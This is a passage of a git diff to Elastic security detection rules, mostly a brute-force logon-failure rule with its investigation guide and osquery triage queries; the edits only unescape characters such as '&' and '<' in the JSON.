!{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json index bae29e14546..0242a4940fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json index 74246a92312..38991a4f6d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json index d71ab475b46..620f66c1129 100644 --- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json index f1c42ca4064..f55271267c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json index 867f27fb846..4bbd60080a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json index b5b03d0099a..de2175ee676 100644 --- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json index 073338fe4c7..d77a73b5255 100644 --- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json index 71e9cd35e5a..3a193848871 100644 --- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json +++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json index 3039c1d345f..0be9a209737 100644 --- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json +++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json index 3ef3fec469e..7d7ba6be4d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json +++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json index abe4f42b216..2c9bf7a4364 100644 --- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json +++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json index 6f13bd4366a..2819141e047 100644 --- a/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json index edea919006d..c57a6c69f8a 100644 --- a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json +++ b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": 